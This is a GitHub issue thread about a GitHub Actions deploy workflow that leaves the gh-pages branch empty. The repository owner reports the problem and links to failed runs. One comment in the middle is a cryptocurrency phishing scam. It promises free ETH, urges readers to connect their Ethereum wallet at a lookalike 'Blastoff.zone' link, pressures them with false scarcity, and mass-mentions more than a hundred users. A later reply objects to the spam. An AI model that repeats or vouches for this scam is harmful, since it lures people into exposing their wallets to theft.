### ISSUE TITLE
GitHub Actions: `deploy` doesn't work

### ISSUE THREAD

**Issue by mattiaerre** [mattiaerre/afacefullofsail#10]
# Description

It looks like the `deploy` step generates an empty `gh-pages` branch;

![github com_mattiaerre_afacefullofsail_tree_gh-pages](https://user-images.githubusercontent.com/6423261/185812231-b64db27a-8650-4538-9ea1-a790171089c1.png)

A new app version can be successfully deployed by running `yarn deploy` from local

![github com_mattiaerre_afacefullofsail_tree_gh-pages (1)](https://user-images.githubusercontent.com/6423261/185812280-dc16c55e-b7fc-401e-a52f-70cba32d3f72.png)

**Comment by mattiaerre** [comment]
this may be the problem: https://github.com/mattiaerre/afacefullofsail/runs/7941871050?check_suite_focus=true#step:4:81

**Comment by mattiaerre** [comment]
I have changed the deploy workflow that now is using `borales/actions-yarn@v3.0.0` instead of `jeoy/github-deploy-actions@v1.0.1`, but there are still errors:

https://github.com/mattiaerre/afacefullofsail/runs/7986736161?check_suite_focus=true#step:6:38

**Comment by fiaz-ali** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
ImanMousavi, @tangqi92, @bomzj, @dibakarsutradhar, @ramozdev, @jasonrobinson, @jm90m, @vincemtnz, @zoxon, @worldroot, @kfukue, @bossoff, @miguilimzero, @nextpulse, @mikostel, @niikkiin, @MasDeny, @bonoogi, @caosbad, @seth-reeser, @smokes, @GTHell, @alsco77, @han-sen, @viktorbezdek, @cbovis, @Pure-Peace, @reConNico, @furkankadioglu, @cleett, @pursonchen, @bruno-martins, @g3kk0, @mdamian9, @NexZhu, @arjanvillon, @ccccqcccc, @yumingvvv, @maxcutie, @michaelrimbach, @oxavibes, @neibla, @sachosun, @ick-seshoka, @zek, @josheche, @wainach, @bopo, @ThWt, @Dmc0125, @elitvynov, @spiceboi, @MarekJCK, @Taicon, @lucastorress, @c-vision, @havingautism, @frankynines, @githubber, @jrbgit, @ChristoPy, @omergulen, @hjnoyon, @romoo, @RedFog-crypto, @caiyue1993, @UpsideDownRide, @GreyforestMedia, @cchx0000, @obazna, @elboletaire, @coeyes, @Galenki, @marcus-sa, @eshohet, @shetz163, @libracoder, @mdawar, @IgorFrolov, @jangsunmi, @pryasin, @xavierlupin, @nguyenhaiduc06, @nofxx, @mroczek20, @aboutlo, @IgorMilivojevic, @YuriSuhanov, @aplaceforallmystuff, @Ercan93, @shoji-zero, @dounine, @billymitchell, @gHashTag, @kayth21, @AndreiCalazans, @jerrysdesign, @hyperreal64, @BenKalskyceruulean, @BowTiedSwan, @gabrieldodan, @hilalh, @addamove, @sargonpiraev, @zhichicao, @arnthor3, @talhasch, @furkanbicak, @Asrover, @bluzi, @db80, @salahudd1n, @Sicria, @henrylao, @andskur, @soerenmartius, @MikeAinOz, @JeffGuKang, @TheTexasFarmer, @shineangelic, @dibakarsutradhar, @OctoD, @axzae, @iamnottheway, @vxxvvxxv, @rak-stor, @LuKeDSP, @medlaam, @SidVal, @sorset90, @alexpmorris, @TheManFromEarth1, @zikosw, @yuyuma, @doroved, @giorgioscappaticcio, @armanfatahi, @scofield-ua, @mrisoli, @inix, @xaverric, @adamalyyan, @wmmariano, @ryoikarashi, @tylerwellss, @dutchybeatz, @ryanve, @dimorphic

**Comment by dibakarsutradhar** [comment]
@fiaz-ali dude stop spamming in github and stop mentioning my account everywhere. This is very absurd and sick behavior.
